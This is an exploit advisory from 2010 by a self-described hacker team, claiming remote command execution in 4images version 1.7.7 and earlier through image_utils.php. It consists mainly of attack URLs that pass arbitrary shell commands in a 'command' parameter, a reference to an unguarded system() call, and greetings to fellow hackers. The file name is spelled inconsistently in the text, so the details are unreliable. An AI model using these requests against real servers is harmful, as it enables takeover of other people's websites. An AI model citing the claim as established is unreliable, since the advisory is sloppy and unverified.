|| || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . +----------------------------------------------------------------------- -+ | ....... | | ..''xxxxxxxxxxxxxxx'... | | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. | | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. | | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. | | .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. | | .xxxxxxxxxxxxxxxxxx'... ........ .'. | | 'xxxxxxxxxxxxxxx'...... '. | | 'xxxxxxxxxxxxxx'..'x.. .x. | | .xxxxxxxxxxxx'...'.. ... .' | | 'xxxxxxxxx'.. . .. .x. | | xxxxxxx'. .. x. | | xxxx'. .... x x. | | 'x'. ...'xxxxxxx'. x .x. | | .x'. .'xxxxxxxxxxxxxx. '' .' | | .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' | | .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. | | .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' | | .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. | | .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. | | .'xxxxxxx'.... ...xxxxxxx'. | | ..'xxxxx'.. ..xxxxx'.. | | ....'xx'.....''''... | +----------------------------------------------------------------------- -+ Remote Command Execution Vulnerability ======================================================================== 4images <= 1.7.7 (image_utils.php) #[+] Author : Sn!pEr.S!Te Hacker # # [+] Email : sniper-site@HoTMaiL.coM # # [+] T34M Sn!pEr.S!Te Hacker # # [+] 12-5-2010 # # [+] Script :4images # # [+] Download:http://www.4homepages.de/downloads/e0adbeb40435/4images1.7.7.zip # Version: [1.7.7] # =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= Exploit : includes/image_utils.php http://localhost/includes/iamge_utils.php?command=[your command] http://127.0.0.1/includes/iamge_utils.php?command=[your command] system($command); line : 104 and 125 my friend : liar - sm Hacker -baby hacker -dmar - mr.Jld - ALhal alsab - adil - Mr.SaTaN - abo badr - aStoorh alqssim - Ramad Hacker- h-ex -